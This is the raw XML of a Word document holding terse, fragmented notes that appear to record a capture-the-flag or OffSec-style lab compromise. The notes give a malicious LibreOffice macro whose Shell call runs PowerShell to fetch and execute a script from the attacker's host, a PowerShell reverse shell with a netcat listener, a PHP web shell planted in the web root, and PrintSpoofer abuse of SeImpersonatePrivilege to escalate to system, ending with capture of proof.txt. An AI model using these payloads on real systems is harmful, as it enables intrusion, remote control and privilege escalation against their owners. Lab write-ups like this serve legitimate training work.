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52F59975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73143D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Craft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0C51EFEC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73143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3143D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73143D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73143D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73143D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73143D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73143D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00884919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="00884919">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00884919">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0073143D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5D84338B" w14:textId="1E5F53CE" w:rsidR="0073143D" w:rsidRDefault="00A659E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visit the website = enter any txt file = we obtain enter the O</w:t>
      </w:r>
      <w:r w:rsidR="004B4114">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5192F3" w14:textId="74BE570B" w:rsidR="00A659E0" w:rsidRDefault="00A659E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apt-get install -y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libreoffice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-writer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CAFFB6" w14:textId="77777777" w:rsidR="00286AF3" w:rsidRDefault="00286AF3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10C70E94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libreoffice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it open the app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F870A46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tools = micros = organize = basic  = add offsec1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA1F659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just test that is that has been open or not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727482C7" w14:textId="77777777" w:rsidR="00D0002A" w:rsidRPr="00843DCE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Shell(“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/c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powershell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iwr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our_ip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“) between main and sub = save it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACA134F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open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libraoffice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writer and </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3553CA31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tools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costomize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opendocument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micro = and open our micro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571D73DB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 -m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SimpleHTTPServer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80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF2879B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in website just enter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odt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file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36490021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in 30 sec we obtain the request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2996BC05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re open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libraryoffice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and go to basic and add offsec2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B7D0FA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copy invoke-powershelltcponeline.ps1 = to the test1.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D8D366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chmod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755 it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D32BBF5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http server start here = with start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lvnp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9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E617FEC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Shell(“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/c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powershell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iwr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hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="003171E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://our_ip:80/offsec.ps1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-o C:/Windows/Tasks/offsec.ps1”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D753303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Shell(“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/c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powershell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-c C:/Windows/Tasks/offsec.ps1”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2432CF5C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do open document  = and select offsec2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA2A1" w14:textId="4C49CB05" w:rsidR="00843DCE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go to website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EAC1C9D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now add that new</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74234532" w14:textId="57E7FD09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if not obtain then notice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oneline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remove the space </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199CC7DD" w14:textId="4DB29AC3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31186895" w14:textId="6425CFAB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c:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1070FB67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net users name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apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59696363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systemifo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for more info of system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B16C1AB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out terminal = vi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cmd.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7310801B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&lt;?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php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system($_GET[‘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’]); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0F747B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terminal go to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xampp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htdocs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echo “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writeTest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>” &gt; data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF48971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type data = we see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writetest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1249B06F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means we can add file here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300259E2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again start python server at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smd.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="653EF87C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powershell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iwr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hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="003171E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve">http://our_ip/cmd.php -o </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="003171E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>cmd.php</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3BCF8E87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visit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websire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again and visit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cmd.php?cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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we can notice its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apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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14377CD5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here we so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/all = notice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seImperonatePrivilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FBCB8F1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its enabled so means if we set the shell where we already have then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very helpful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760FCCEA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print spoofer x64.exe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github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57352544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it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE39013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wget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to out terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311AF1BC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curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="003171E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://t_ip/cmd.exe=whoami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= website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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71B8820D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visit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urlencode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E6214DF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hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="003171E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>powershell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iwr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hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="003171E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://our_ip:80/PrintSpoofer64.exe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-o C://Windows/Tasks/Printspoodfer64.exe = encode it then paste </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C79B6F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curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="003171E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://t_ip/cmd.exe?cmd=paste</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3BA2C4CC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lvnp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9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6486EB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C:/Windows/Tasks/PrintSpoofer64.exe -c “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/c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powershell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-c C:/Windows/tasks/offsec.ps1” = encode it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2198EA25" w14:textId="77777777" w:rsidR="00D0002A" w:rsidRDefault="00D0002A" w:rsidP="00D0002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curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="003171E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://t_ip?cmd.exe?cmd=paste</w:t>
        </w:r>
      </w:hyperlink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77777777" w:rsidR="00843DCE" w:rsidRPr="00D0002A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0D8C61" w14:textId="57878F5A" w:rsidR="00A311DF" w:rsidRPr="00D0002A" w:rsidRDefault="00D0002A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0002A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and we got the proof.txt</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A311DF" w:rsidRPr="00D00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242035"/>
    <w:rsid w:val="00286AF3"/>
    <w:rsid w:val="002B493A"/>
    <w:rsid w:val="003E3E44"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="004B4114"/>
    <w:rsid w:val="00673B17"/>
    <w:rsid w:val="0073143D"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00884919"/>
    <w:rsid w:val="009D29D0"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A659E0"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D0002A"/>
    <w:rsid w:val="00D56995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3E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E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ur_ip:80/PrintSpoofer64.ex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t_ip/cmd.php?cmd=powershel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t_ip/cmd.exe=whoami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our_ip/cmd.php%20-o%20cmd.php" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://t_ip?cmd.exe?cmd=paste" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://our_ip:80/offsec.ps1" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://t_ip/cmd.exe?cmd=pas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9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-10T17:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>